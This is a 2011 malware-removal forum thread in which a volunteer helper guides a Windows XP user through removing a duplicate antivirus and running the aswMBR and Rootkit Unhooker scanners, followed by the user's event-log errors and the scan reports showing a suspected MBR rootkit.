Update for Windows XP (KB971737)
Update for Windows XP (KB973687)
Update for Windows XP (KB973815)
USB Video Camera
VIPRE Antivirus
Visual C++ Runtime for Dragon NaturallySpeaking
Watchtower Library 2010 - English
WebFldrs XP
Windows Genuine Advantage Notifications (KB905474)
Windows Genuine Advantage v1.3.0254.0
Windows Imaging Component
Windows Internet Explorer 7
Windows Internet Explorer 8
Windows Live OneCare safety scanner
Windows Media Format 11 runtime
Windows Media Player 10
Windows Media Player 11
Windows PowerShell(TM) 1.0
Windows Resource Kit Tools
WinPatrol
Word in Works Suite add-in
ZipItFree 1.80
.
==== Event Viewer Messages From Past Week ========
.
6/8/2011 9:32:48 AM, error: Service Control Manager [7022] - The AVGIDSAgent service hung on starting.
6/8/2011 9:24:06 AM, error: Service Control Manager [7031] - The AVG WatchDog service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 0 milliseconds: Restart the service.
6/8/2011 9:24:06 AM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the AVGIDSAgent service to connect.
6/8/2011 9:24:06 AM, error: Service Control Manager [7000] - The AVGIDSAgent service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/8/2011 11:20:18 AM, error: Service Control Manager [7001] - The MBAMService service depends on the MBAMProtector service which failed to start because of the following error: The system cannot find the file specified.
6/8/2011 11:20:18 AM, error: Service Control Manager [7000] - The MBAMProtector service failed to start due to the following error: The system cannot find the file specified.
6/8/2011 11:07:30 AM, error: Service Control Manager [7023] - The Application Management service terminated with the following error: The specified module could not be found.
6/7/2011 7:52:41 AM, error: Service Control Manager [7000] - The sbapifs service failed to start due to the following error: The parameter is incorrect.
6/7/2011 7:35:03 AM, error: Service Control Manager [7000] - The AVG Mini-Filter Resident Anti-Virus Shield service failed to start due to the following error: The parameter is incorrect.
6/7/2011 12:09:05 PM, error: Service Control Manager [7000] - The Avira AntiVir Guard service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/7/2011 12:09:04 PM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the Avira AntiVir Guard service to connect.
6/6/2011 12:55:22 AM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service SBAMSvc with arguments "" in order to run the server: {FE7E09CE-BBF4-4698-8BC1-37C9002DAA43}
6/6/2011 1:37:12 PM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: Aavmker4 AFD aswRdr aswSP aswTdi avgio avipbb Beep Fips intelppm IPSec MRxSmb NetBIOS NetBT RasAcd Rdbss SASDIFSV SASKUTIL sbaphd SbTis ssmdrv Tcpip
6/5/2011 4:04:24 PM, error: Service Control Manager [7000] - The SABProcEnum service failed to start due to the following error: The system cannot find the file specified.
6/5/2011 3:44:23 PM, error: DCOM [10005] - DCOM got error "%1058" attempting to start the service wuauserv with arguments "" in order to run the server: {E60687F7-01A1-40AA-86AC-DB1CBF673334}
6/5/2011 3:34:24 AM, error: Service Control Manager [7031] - The .NET Runtime Optimization Service v2.0.50727_X86 service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 960000 milliseconds: Restart the service.
6/5/2011 3:30:52 AM, error: Service Control Manager [7031] - The .NET Runtime Optimization Service v2.0.50727_X86 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
6/5/2011 3:30:14 PM, error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 2 time(s).
6/5/2011 2:57:00 AM, error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 2:56:57 AM, error: Service Control Manager [7034] - The PC Tools Auxiliary Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 2:53:53 AM, error: Service Control Manager [7034] - The Browser Defender Update Service service terminated unexpectedly. It has done this 1 time(s).
6/5/2011 11:28:48 AM, error: Service Control Manager [7009] - Timeout (30000 milliseconds) waiting for the PC Tools Security Service service to connect.
6/5/2011 11:28:48 AM, error: Service Control Manager [7000] - The PC Tools Security Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
6/4/2011 3:39:24 PM, error: Service Control Manager [7034] - The Volume Shadow Copy service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 3:39:11 PM, error: Service Control Manager [7034] - The Distributed Transaction Coordinator service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 3:38:57 PM, error: Service Control Manager [7034] - The MS Software Shadow Copy Provider service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 2:31:44 PM, error: Service Control Manager [7034] - The Volume Shadow Copy service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:31:19 PM, error: Service Control Manager [7034] - The Distributed Transaction Coordinator service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:30:53 PM, error: Service Control Manager [7034] - The MS Software Shadow Copy Provider service terminated unexpectedly. It has done this 1 time(s).
6/4/2011 2:30:16 PM, error: Service Control Manager [7031] - The COM+ System Application service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 1000 milliseconds: Restart the service.
6/4/2011 12:56:20 PM, error: Service Control Manager [7034] - The VIPRE Antivirus service terminated unexpectedly. It has done this 2 time(s).
6/4/2011 12:29:06 PM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Watchtower\Watchtower Library 2010\E\WTLibrary.exe. Reference error message: The operation completed successfully. .
6/4/2011 11:27:19 AM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Avira\AntiVir Desktop\shlext.dll. Reference error message: The operation completed successfully. .
6/4/2011 11:23:24 AM, error: SideBySide [59] - Resolve Partial Assembly failed for Microsoft.VC90.MFC. Reference error message: The referenced assembly is not installed on your system. .
6/4/2011 11:23:24 AM, error: SideBySide [59] - Generate Activation Context failed for C:\Program Files\Avira\AntiVir Desktop\avwsc.exe. Reference error message: The operation completed successfully. .
6/4/2011 11:23:24 AM, error: SideBySide [32] - Dependent Assembly Microsoft.VC90.MFC could not be found and Last Error was The referenced assembly is not installed on your system.
6/4/2011 11:12:23 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service wuauserv with arguments "" in order to run the server: {E60687F7-01A1-40AA-86AC-DB1CBF673334}
6/4/2011 11:11:39 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service StiSvc with arguments "" in order to run the server: {A1F4E726-8CF1-11D1-BF92-0060081ED811}
6/4/2011 11:11:38 AM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: AFD avgio avipbb Beep Fips intelppm IPSec MRxSmb NetBIOS NetBT RasAcd Rdbss sbaphd SbTis ssmdrv Tcpip
6/4/2011 11:11:38 AM, error: Service Control Manager [7001] - The DNS Client service depends on the TCP/IP Protocol Driver service which failed to start because of the following error: A device attached to the system is not functioning.
6/4/2011 11:11:38 AM, error: Service Control Manager [7001] - The DHCP Client service depends on the NetBios over Tcpip service which failed to start because of the following error: A device attached to the system is not functioning.
6/4/2011 11:10:39 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service netman with arguments "" in order to run the server: {BA126AE5-2166-11D1-B1D0-00805FC1270E}
6/4/2011 11:10:28 AM, error: DCOM [10005] - DCOM got error "%1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
6/4/2011 10:50:36 AM, error: Service Control Manager [7026] - The following boot-start or system-start driver(s) failed to load: Beep
6/4/2011 10:50:33 AM, error: Service Control Manager [7000] - The NLS Service service failed to start due to the following error: The system cannot find the file specified.
6/3/2011 9:04:49 PM, error: Service Control Manager [7006] - The ScRegSetValueExW call failed for Start with the following error: Access is denied.
6/3/2011 7:44:39 PM, error: NtServicePack [4373] - Windows XP Service Pack 3 installation failed.
An internal error occurred.
6/2/2011 12:14:06 PM, error: Service Control Manager [7034] - The SB Recovery Service service terminated unexpectedly. It has done this 1 time(s).
6/2/2011 12:14:00 PM, error: Service Control Manager [7034] - The VIPRE Antivirus service terminated unexpectedly. It has done this 1 time(s).
6/2/2011 12:14:00 PM, error: Service Control Manager [7022] - The VIPRE Antivirus service hung on starting.
6/2/2011 12:12:18 PM, error: Service Control Manager [7022] - The Avira AntiVir Guard service hung on starting.
.
==== End Of File ===========================
ard
Regular Member
 
Posts: 41
Joined: August 25th, 2009, 7:12 am
Advertisement
Register to Remove

Re: redirected searches and email problems

Unread postby melboy » June 11th, 2011, 10:02 am

Hi and welcome to the MR forums. :)

I'm melboy and I am going to try to help you with your problem. Please take note of the following:

  1. I will be working on your Malware issues this may or may not solve other issues you have with your machine.
  2. The fixes are specific to your problem and should only be used for this issue on this machine.
  3. If you don't know or understand something, please don't hesitate to ask.
  4. Please refrain from making any further changes to your computer (Install/Uninstall programs, delete files, edit the registry, etc...)
  5. Please DO NOT run any other tools or scans whilst I am helping you.
  6. It is important that you reply to this thread. Do not start a new topic.
  7. DO NOT attach logs unless requested to. Please copy/paste all requested logs into your replies.
  8. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
  9. Absence of symptoms does not mean that everything is clear.


NOTE: Please take time to read the Malware Removal Forum Guidelines and Rules where the conditions for receiving help at this forum are explained.


IMPORTANT: Please be aware that removing Malware is a potentially hazardous undertaking. I will take care not to knowingly suggest courses of action that might damage your computer. However it is impossible for me to foresee all interactions that may happen between the software on your computer and those we'll use to clear you of infection, and I cannot guarantee the safety of your system. It is possible that we might encounter situations where the only recourse is to re-format and re-install your operating system, or to necessitate you taking your computer to a repair shop.

Because of this, I advise you to backup any personal files and folders before you start.



No Reply Within 3 Days Will Result In Your Topic Being Closed!! If you need more time, please inform me.


===========================================


Multiple Anti Virus programs.

  • Avira AntiVir
  • VIPRE Antivirus

Please ensure Vipre Antivirus is fully removed.

It is NOT safe to have more than one anti-virus installed on a system, and that doing so not only does not provide better protection, it will actually cause additional problems. Anti-virus programs patch into the system kernel. Having more than one anti-virus patching into the system kernel will not only destabilize a system, it can corrupt system files and it WILL cause crashes! You MUST remove all but one anti-virus program.

  • Click Start
  • Go to Control Panel
  • Go to Add/Remove Programs
  • Find and click Remove for the following (if present):
VIPRE Antivirus

Then download VPPClean.exe from Here & save it to your desktop.

  • Double click VPPClean.exe to run it.
  • Click the Clean button.
  • Click Yes to the prompt.
  • If prompted to Reboot, please do so.



aswMBR

Download aswMBR and save it to your Desktop.

  • Double click aswMBR.exe to run it.
  • Click the Scan button.
  • After a short while when the scan reports "Scan finished successfully", click Save log & save the log to your desktop.
  • Click OK
  • Two files will be created, aswMBR.txt & a file named MBR.dat
  • Save MBR.dat to to a form of removable media. (CD, DVD, USB flash drive etc) - This is a backup of your MBR. Do not delete this file.
  • NOTE: Do not click to fix anything at this stage!
  • Click EXIT.
  • Copy & Paste the contents of aswMBR.txt into your next reply.



Rootkit Unhooker

Download Rootkit Unhooker Save it to your desktop.

  • Double click RKUnhookerLE.exe to run it.
  • Click the Report tab, then click Scan.
  • Check Drivers, Stealth. uncheck the rest. then Click OK.
  • Wait till the scanner has finished and then click File, Save Report.
  • Save the report somewhere where you can find it. (eg. desktop) then Click Close.
  • Copy the entire contents of the report and paste it in a reply here.

Note** you may get the following warning, just click OK and continue.
"Rootkit Unhooker has detected a parasite inside itself!
It is recommended to remove parasite, okay?"





In your next reply:
  1. aswMBR.txt
  2. Report.txt
User avatar
melboy
MRU Expert
MRU Expert
 
Posts: 3670
Joined: July 25th, 2008, 4:25 pm
Location: UK

Re: redirected searches and email problems

Unread postby ard » June 12th, 2011, 2:59 am

Hi melboy -

VIPRE Antivirus removed

VPPClean.exe run

aswMBR.exe run

RKUnhookerLE.exe run

aswMBR.txt and Report.txt below


aswMBR version 0.9.6.399 Copyright(c) 2011 AVAST Software
Run date: 2011-06-12 02:27:40
-----------------------------
02:27:40.890 OS Version: Windows 5.1.2600 Service Pack 3
02:27:40.890 Number of processors: 1 586 0x403
02:27:40.890 ComputerName: OWLDELL UserName: admin
02:27:42.375 Initialize success
02:29:48.984 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0
02:29:48.984 Disk 0 Vendor: Maxtor_6 YAR5 Size: 152587MB BusType: 3
02:29:49.015 Disk 0 MBR read successfully
02:29:49.015 Disk 0 MBR scan
02:29:49.015 Disk 0 unknown MBR code
02:29:49.015 Disk 0 scanning sectors +312496380
02:29:49.046 Disk 0 scanning C:\WINDOWS\system32\drivers
02:29:56.265 Service scanning
02:29:58.671 Disk 0 trace - called modules:
02:29:58.671 ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x828001ed]<<
02:29:58.687 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x83184ab8]
02:29:58.687 3 CLASSPNP.SYS[f8527fd7] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-0[0x83193030]
02:29:58.687 \Driver\iastor[0x831d3a08] -> IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0x828001ed
02:29:58.703 Scan finished successfully
02:30:35.812 Disk 0 MBR has been saved successfully to "C:\Documents and Settings\admin\Desktop\MBR.dat"
02:30:35.812 The log file has been saved successfully to "C:\Documents and Settings\admin\Desktop\aswMBR.txt"


RkU Version: 3.8.389.593, Type LE (SR2)
==============================================
OS Name: Windows XP
Version 5.1.2600 (Service Pack 3)
Number of processors #1
==============================================
>Drivers
==============================================
0xBF0B2000 C:\WINDOWS\System32\ati3duag.dll 2297856 bytes (ATI Technologies Inc. , ati3duag.dll)
0x804D7000 C:\WINDOWS\system32\ntkrnlpa.exe 2154496 bytes (Microsoft Corporation, NT Kernel & System)
0x804D7000 PnpManager 2154496 bytes
0x804D7000 RAW 2154496 bytes
0x804D7000 WMIxWDM 2154496 bytes
0xBF800000 Win32k 1859584 bytes
0xBF800000 C:\WINDOWS\System32\win32k.sys 1859584 bytes (Microsoft Corporation, Multi-User Win32 Driver)
0xF7FB4000 C:\WINDOWS\system32\DRIVERS\ati2mtag.sys 1073152 bytes (ATI Technologies Inc., ATI Radeon WindowsNT Miniport Driver)
0xF58E3000 C:\WINDOWS\System32\Drivers\dump_iastor.sys 872448 bytes
0xF829B000 iastor.sys 872448 bytes (Intel Corporation, Intel Matrix Storage Manager driver)
0xBF2E3000 C:\WINDOWS\System32\ativvaxx.dll 610304 bytes (ATI Technologies Inc. , Radeon Video Acceleration Universal Driver)
0xF81B2000 Ntfs.sys 577536 bytes (Microsoft Corporation, NT File System Driver)
0xF5AD3000 C:\WINDOWS\system32\DRIVERS\mrxsmb.sys 458752 bytes (Microsoft Corporation, Windows NT SMB Minirdr)
0xF7E47000 C:\WINDOWS\system32\DRIVERS\update.sys 385024 bytes (Microsoft Corporation, Update Driver)
0xF5C00000 C:\WINDOWS\system32\DRIVERS\tcpip.sys 364544 bytes (Microsoft Corporation, TCP/IP Protocol Driver)
0xB7F17000 C:\WINDOWS\system32\DRIVERS\srv.sys 360448 bytes (Microsoft Corporation, Server driver)
0xBF378000 C:\WINDOWS\System32\ATMFD.DLL 290816 bytes (Adobe Systems Incorporated, Windows NT OpenType/Type 1 Font Driver)
0xBF012000 C:\WINDOWS\System32\ati2dvag.dll 245760 bytes (ATI Technologies Inc., ATI Radeon WindowsNT Display Driver)
0xBF04E000 C:\WINDOWS\System32\ati2cqag.dll 204800 bytes (ATI Technologies Inc., Central Memory Manager / Queue Server Module)
0xBF080000 C:\WINDOWS\System32\atikvmag.dll 204800 bytes (ATI Technologies Inc., Virtual Command And Memory Manager)
0xF83B8000 ACPI.sys 188416 bytes (Microsoft Corporation, ACPI Driver for NT)
0xF59E0000 C:\WINDOWS\System32\Drivers\cam1690.sys 184320 bytes (-, USB Camera Driver)
0xB85B6000 C:\WINDOWS\system32\DRIVERS\mrxdav.sys 184320 bytes (Microsoft Corporation, Windows NT WebDav Minirdr)
0xF8185000 NDIS.sys 184320 bytes (Microsoft Corporation, NDIS 5.1 wrapper driver)
0xF5D33000 C:\WINDOWS\system32\drivers\sthda.sys 180224 bytes (SigmaTel, Inc., NDRC)
0xB7A96000 C:\WINDOWS\system32\drivers\kmixer.sys 176128 bytes (Microsoft Corporation, Kernel Mode Audio Mixer)
0xF5B43000 C:\WINDOWS\system32\DRIVERS\rdbss.sys 176128 bytes (Microsoft Corporation, Redirected Drive Buffering SubSystem Driver)
0xF7F78000 C:\WINDOWS\system32\DRIVERS\HDAudBus.sys 163840 bytes (Windows (R) Server 2003 DDK provider, High Definition Audio Bus Driver v1.0a)
0xF5BD8000 C:\WINDOWS\system32\DRIVERS\netbt.sys 163840 bytes (Microsoft Corporation, MBT Transport driver)
0xF5AAD000 C:\WINDOWS\system32\DRIVERS\avipbb.sys 155648 bytes (Avira GmbH, Avira Driver for Security Enhancement)
0xF7F2E000 C:\WINDOWS\system32\DRIVERS\e100b325.sys 155648 bytes (Intel Corporation, Intel(R) PRO/100 Adapter NDIS 5.1 driver)
0xF5BB2000 C:\WINDOWS\system32\DRIVERS\ipnat.sys 155648 bytes (Microsoft Corporation, IP Network Address Translator)
0xF7ECD000 C:\WINDOWS\system32\drivers\portcls.sys 147456 bytes (Microsoft Corporation, Port Class (Class Driver for Port/Miniport Devices))
0xF7F54000 C:\WINDOWS\system32\DRIVERS\USBPORT.SYS 147456 bytes (Microsoft Corporation, USB 1.1 & 2.0 Port Driver)
0xF7F0B000 C:\WINDOWS\system32\DRIVERS\ks.sys 143360 bytes (Microsoft Corporation, Kernel CSA Library)
0xF5B90000 C:\WINDOWS\System32\drivers\afd.sys 139264 bytes (Microsoft Corporation, Ancillary Function Driver for WinSock)
0xF5B6E000 C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS 139264 bytes (SUPERAdBlocker.com and SUPERAntiSpyware.com, SASKUTIL.SYS)
0x806E5000 ACPI_HAL 134400 bytes
0x806E5000 C:\WINDOWS\system32\hal.dll 134400 bytes (Microsoft Corporation, Hardware Abstraction Layer DLL)
0xF827B000 fltmgr.sys 131072 bytes (Microsoft Corporation, Microsoft Filesystem Filter Manager)
0xF8388000 ftdisk.sys 126976 bytes (Microsoft Corporation, FT Disk Driver)
0xF816B000 Mup.sys 106496 bytes (Microsoft Corporation, Multiple UNC Provider driver)
0xF7EF1000 C:\WINDOWS\system32\drivers\pbsaudrv.sys 106496 bytes (PolderbitS Software, PolderbitS Audio Driver)
0xF8370000 atapi.sys 98304 bytes (Microsoft Corporation, IDE/ATAPI Port Driver)
0xF8252000 KSecDD.sys 94208 bytes (Microsoft Corporation, Kernel Security Support Provider Interface)
0xF7EB6000 C:\WINDOWS\system32\DRIVERS\ndiswan.sys 94208 bytes (Microsoft Corporation, MS PPP Framing Driver (Strong Encryption))
0xB8773000 C:\WINDOWS\system32\DRIVERS\avgntflt.sys 86016 bytes (Avira GmbH, Avira Minifilter Driver)
0xB84D9000 C:\WINDOWS\system32\drivers\wdmaud.sys 86016 bytes (Microsoft Corporation, MMSYSTEM Wave/Midi API mapper)
0xF7FA0000 C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS 81920 bytes (Microsoft Corporation, Video Port Driver)
0xF5C59000 C:\WINDOWS\system32\DRIVERS\ipsec.sys 77824 bytes (Microsoft Corporation, IPSec Driver)
0xF823F000 WudfPf.sys 77824 bytes (Microsoft Corporation, Windows Driver Foundation - User-mode Driver Framework Platform Driver)
0xBF000000 C:\WINDOWS\System32\drivers\dxg.sys 73728 bytes (Microsoft Corporation, DirectX Graphics Driver)
0xF8269000 sr.sys 73728 bytes (Microsoft Corporation, System Restore Filesystem Filter Driver)
0xF83A7000 pci.sys 69632 bytes (Microsoft Corporation, NT Plug and Play PCI Enumerator)
0xF7EA5000 C:\WINDOWS\system32\DRIVERS\psched.sys 69632 bytes (Microsoft Corporation, MS QoS Packet Scheduler)
0xF86B7000 C:\WINDOWS\System32\Drivers\Cdfs.SYS 65536 bytes (Microsoft Corporation, CD-ROM File System Driver)
0xF8567000 C:\WINDOWS\system32\DRIVERS\cdrom.sys 65536 bytes (Microsoft Corporation, SCSI CD-ROM Driver)
0xF8597000 C:\WINDOWS\system32\drivers\drmk.sys 61440 bytes (Microsoft Corporation, Microsoft Kernel DRM Descrambler Filter)
0xF8577000 C:\WINDOWS\system32\DRIVERS\redbook.sys 61440 bytes (Microsoft Corporation, Redbook Audio Filter Driver)
0xF5A7D000 C:\WINDOWS\system32\drivers\sysaudio.sys 61440 bytes (Microsoft Corporation, System Audio WDM Filter)
0xF8647000 C:\WINDOWS\system32\DRIVERS\usbhub.sys 61440 bytes (Microsoft Corporation, Default Hub Driver for USB)
0xF8527000 C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS 53248 bytes (Microsoft Corporation, SCSI Class System Dll)
0xF85B7000 C:\WINDOWS\system32\DRIVERS\rasl2tp.sys 53248 bytes (Microsoft Corporation, RAS L2TP mini-port/call-manager driver)
0xF7DA7000 C:\WINDOWS\System32\Drivers\STREAM.SYS 53248 bytes (Microsoft Corporation, WDM CODEC Class Device Driver 2.0)
0xF8507000 VolSnap.sys 53248 bytes (Microsoft Corporation, Volume Shadow Copy Driver)
0xF85D7000 C:\WINDOWS\system32\DRIVERS\raspptp.sys 49152 bytes (Microsoft Corporation, Peer-to-Peer Tunneling Protocol)
0xF85A7000 C:\WINDOWS\system32\drivers\tbhsd.sys 49152 bytes (RapidSolution Software AG, Tunebite High-Speed Dubbing)
0xB7B31000 C:\DOCUME~1\admin\LOCALS~1\Temp\aswMBR.sys 45056 bytes
0xF86C7000 C:\WINDOWS\System32\Drivers\Fips.SYS 45056 bytes (Microsoft Corporation, FIPS Crypto Driver)
0xF8587000 C:\WINDOWS\system32\DRIVERS\imapi.sys 45056 bytes (Microsoft Corporation, IMAPI Kernel Driver)
0xF84F7000 MountMgr.sys 45056 bytes (Microsoft Corporation, Mount Manager)
0xF85C7000 C:\WINDOWS\system32\DRIVERS\raspppoe.sys 45056 bytes (Microsoft Corporation, RAS PPPoE mini-port/call-manager driver)
0xF84E7000 isapnp.sys 40960 bytes (Microsoft Corporation, PNP ISA Bus Driver)
0xF8637000 C:\WINDOWS\System32\Drivers\NDProxy.SYS 40960 bytes (Microsoft Corporation, NDIS Proxy)
0xF8607000 C:\WINDOWS\system32\DRIVERS\rrnetcap.sys 40960 bytes (RapidSolution Software AG, Intermediate Filter Driver)
0xF85F7000 C:\WINDOWS\system32\DRIVERS\termdd.sys 40960 bytes (Microsoft Corporation, Terminal Server Driver)
0xB7BE1000 C:\WINDOWS\System32\Drivers\BlackBox.SYS 36864 bytes (RKU Driver)
0xF8517000 disk.sys 36864 bytes (Microsoft Corporation, PnP Disk Driver)
0xF86D7000 C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS 36864 bytes (Microsoft Corporation, Hid Class Library)
0xF8557000 C:\WINDOWS\system32\DRIVERS\intelppm.sys 36864 bytes (Microsoft Corporation, Processor Device Driver)
0xF85E7000 C:\WINDOWS\system32\DRIVERS\msgpc.sys 36864 bytes (Microsoft Corporation, MS General Packet Classifier)
0xF86A7000 C:\WINDOWS\system32\DRIVERS\netbios.sys 36864 bytes (Microsoft Corporation, NetBIOS interface driver)
0xF8537000 PxHelp20.sys 36864 bytes (Sonic Solutions, Px Engine Device Driver for Windows 2000/XP)
0xF8697000 C:\WINDOWS\system32\DRIVERS\wanarp.sys 36864 bytes (Microsoft Corporation, MS Remote Access and Routing ARP Driver)
0xF88EF000 C:\WINDOWS\System32\Drivers\Npfs.SYS 32768 bytes (Microsoft Corporation, NPFS Driver)
0xF882F000 C:\WINDOWS\system32\DRIVERS\usbccgp.sys 32768 bytes (Microsoft Corporation, USB Common Class Generic Parent Driver)
0xF88DF000 C:\WINDOWS\system32\DRIVERS\usbehci.sys 32768 bytes (Microsoft Corporation, EHCI eUSB Miniport Driver)
0xF87A7000 C:\WINDOWS\system32\DRIVERS\fdc.sys 28672 bytes (Microsoft Corporation, Floppy Disk Controller Driver)
0xF889F000 C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS 28672 bytes (Microsoft Corporation, Hid Parsing Library)
0xF8767000 C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS 28672 bytes (Microsoft Corporation, PCI IDE Bus Driver Extension)
0xF88A7000 C:\WINDOWS\system32\DRIVERS\usbprint.sys 28672 bytes (Microsoft Corporation, USB Printer driver)
0xF87DF000 C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS 28672 bytes (Microsoft Corporation, USB Mass Storage Class Driver)
0xF8777000 C:\WINDOWS\system32\DRIVERS\kbdclass.sys 24576 bytes (Microsoft Corporation, Keyboard Class Driver)
0xF8797000 C:\WINDOWS\system32\DRIVERS\mouclass.sys 24576 bytes (Microsoft Corporation, Mouse Class Driver)
0xF87CF000 C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS 24576 bytes (SUPERAdBlocker.com and SUPERAntiSpyware.com, SASDIFSV.SYS)
0xF8787000 C:\WINDOWS\system32\DRIVERS\ssmdrv.sys 24576 bytes (Avira GmbH, AVIRA SnapShot Driver)
0xF88AF000 C:\WINDOWS\system32\DRIVERS\usbuhci.sys 24576 bytes (Microsoft Corporation, UHCI USB Miniport Driver)
0xF88B7000 C:\WINDOWS\System32\drivers\vga.sys 24576 bytes (Microsoft Corporation, VGA/Super VGA Video Driver)
0xF8867000 C:\WINDOWS\system32\DRIVERS\flpydisk.sys 20480 bytes (Microsoft Corporation, Floppy Driver)
0xF88CF000 C:\WINDOWS\System32\Drivers\Msfs.SYS 20480 bytes (Microsoft Corporation, Mailslot driver)
0xF8817000 C:\WINDOWS\system32\DRIVERS\omci.sys 20480 bytes (Dell Computer Corporation, OMCI Device Driver)
0xF876F000 PartMgr.sys 20480 bytes (Microsoft Corporation, Partition Manager)
0xF88C7000 C:\WINDOWS\system32\DRIVERS\ptilink.sys 20480 bytes (Parallel Technologies, Inc., Parallel Technologies DirectParallel IO Library)
0xF88D7000 C:\WINDOWS\system32\DRIVERS\raspti.sys 20480 bytes (Microsoft Corporation, PTI DirectParallel(R) mini-port/call-manager driver)
0xF8897000 C:\WINDOWS\system32\DRIVERS\TDI.SYS 20480 bytes (Microsoft Corporation, TDI Wrapper)
0xF87EF000 C:\WINDOWS\System32\watchdog.sys 20480 bytes (Microsoft Corporation, Watchdog Driver)
0xB8110000 C:\WINDOWS\System32\drivers\aspi32.sys 16384 bytes (Adaptec, ASPI for WIN32 Kernel Driver)
0xB7D19000 C:\WINDOWS\system32\DRIVERS\asyncmac.sys 16384 bytes (Microsoft Corporation, MS Remote Access serial network driver)
0xF5C90000 C:\WINDOWS\system32\DRIVERS\kbdhid.sys 16384 bytes (Microsoft Corporation, HID Mouse Filter Driver)
0xF80DE000 C:\WINDOWS\system32\DRIVERS\mssmbios.sys 16384 bytes (Microsoft Corporation, System Management BIOS Driver)
0xF88F7000 C:\WINDOWS\system32\BOOTVID.dll 12288 bytes (Microsoft Corporation, VGA Boot Driver)
0xF59C0000 C:\WINDOWS\System32\drivers\Dxapi.sys 12288 bytes (Microsoft Corporation, DirectX API Driver)
0xF89C7000 C:\WINDOWS\system32\DRIVERS\hidusb.sys 12288 bytes (Microsoft Corporation, USB Miniport Driver for Input Devices)
0xF89BF000 C:\WINDOWS\System32\Drivers\i2omgmt.SYS 12288 bytes (Microsoft Corporation, I2O Utility Filter)
0xB8118000 C:\WINDOWS\system32\DRIVERS\MaVc2K.sys 12288 bytes (Mobile Action Technology Inc., Mobile Action Virtual Control)
0xF5C88000 C:\WINDOWS\system32\DRIVERS\mouhid.sys 12288 bytes (Microsoft Corporation, HID Mouse Filter Driver)
0xF812A000 C:\WINDOWS\system32\DRIVERS\ndistapi.sys 12288 bytes (Microsoft Corporation, NDIS 3.0 connection wrapper driver)
0xF89CF000 C:\WINDOWS\system32\DRIVERS\rasacd.sys 12288 bytes (Microsoft Corporation, RAS Automatic Connection Driver)
0xF8A17000 C:\Program Files\Avira\AntiVir Desktop\avgio.sys 8192 bytes (Avira GmbH, Avira AntiVir Support for Minifilter)
0xF8A65000 C:\WINDOWS\system32\DRIVERS\dsunidrv.sys 8192 bytes (Gteko Ltd., GUniDriver)
0xF8A03000 C:\WINDOWS\System32\Drivers\Fs_Rec.SYS 8192 bytes (Microsoft Corporation, File System Recognizer Driver)
0xF89E7000 C:\WINDOWS\system32\KDCOM.DLL 8192 bytes (Microsoft Corporation, Kernel Debugger HW Extension DLL)
0xF8A07000 C:\WINDOWS\System32\Drivers\mnmdd.SYS 8192 bytes (Microsoft Corporation, Frame buffer simulator)
0xF8A0B000 C:\WINDOWS\System32\DRIVERS\RDPCDD.sys 8192 bytes (Microsoft Corporation, RDP Miniport)
0xF89F7000 C:\WINDOWS\system32\DRIVERS\swenum.sys 8192 bytes (Microsoft Corporation, Plug and Play Software Device Enumerator)
0xF89FF000 C:\WINDOWS\system32\DRIVERS\USBD.SYS 8192 bytes (Microsoft Corporation, Universal Serial Bus Driver)
0xF89E9000 C:\WINDOWS\system32\DRIVERS\WMILIB.SYS 8192 bytes (Microsoft Corporation, WMILIB WMI support library Dll)
0xF8ADC000 C:\WINDOWS\system32\DRIVERS\audstub.sys 4096 bytes (Microsoft Corporation, AudStub Driver)
0xF8B9C000 C:\WINDOWS\System32\drivers\dxgthk.sys 4096 bytes (Microsoft Corporation, DirectX Graphics Driver Thunk)
0xF8B82000 C:\WINDOWS\System32\Drivers\Null.SYS 4096 bytes (Microsoft Corporation, NULL Driver)
0xF8AAF000 pciide.sys 4096 bytes (Microsoft Corporation, Generic PCI IDE Bus Driver)
==============================================
>Stealth
==============================================
0x82801A91 Unknown page with executable code, 1391 bytes
0x82800288 Unknown page with executable code, 3448 bytes
0x82802191 Unknown page with executable code, 3695 bytes
0xF8507000 WARNING: Virus alike driver modification [VolSnap.sys], 53248 bytes
